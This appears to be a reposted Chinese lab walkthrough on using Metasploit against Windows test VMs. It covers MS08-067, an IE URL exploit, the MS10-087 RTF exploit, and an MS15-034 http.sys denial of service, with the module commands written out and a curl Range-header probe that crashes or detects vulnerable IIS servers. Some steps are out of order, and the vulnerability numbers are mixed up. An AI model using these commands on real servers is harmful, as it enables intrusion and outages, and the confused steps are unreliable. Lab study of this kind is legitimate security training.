msf实验Windows漏洞

msf实验Windows漏洞,第1张

首先search ms08-067漏洞然后info查看

show options查看配置

我们让目标机访问下这个url,这时msfconsole中就出现了successfuully,我们按回车(这里我尝试了好久,每次靶机访问IE就跳出OD来,最后把靶机里面的OD删掉就好了)。

sessions -i 1进入会话

用到的靶机为:WinXPenSP3。

打开msfconsole

搜索下ms10-018的路径:search ms10-087。

使用这个模块

Use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

执行show options配置环境

我们把文件名改成ceshi。我们设置现在让他弹出一个计算器:set CMD calc.exe。

显示隐藏文件找到生成文件

找到后利用刚刚ms10-018上传运行

(1)利用ms15-034漏洞读取服务器内存数据

(2)利用ms15-034漏洞进行ddos攻击

use auxiliary/dos/http/ms15_034_ulonglongadd //打开这个漏洞模块

set

rhosts 192.168.80.130//配置目标IP

set

threads 10//配置10个线程

run//运行

漏洞主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。IIS6.0以上。

靶机:win7  iis7

win7安装好iis服务后访问80端口,检测是否存在漏洞:使用curl发送以下数据

curl http://192.168.137.129 -H "Host: 192.168.137.129" -H "Range: bytes=0-18446744073709551615"

当出现Requested Range Not Satisfiable时说明存在漏洞。

使用metasploit的auxiliary/dos/http/ms15_034_ulonglongadd模块可直接造成服务器蓝屏,

使用auxiliary/scanner/http/ms15_034_http_sys_memory_dump模块检测时仅针对:windoiws 8.1, 2012, or 2012R2有效。


欢迎分享,转载请注明来源:夏雨云

原文地址:https://www.xiayuyun.com/zonghe/15633.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-02-13
下一篇2023-02-13

发表评论

登录后才能评论

评论列表(0条)

    保存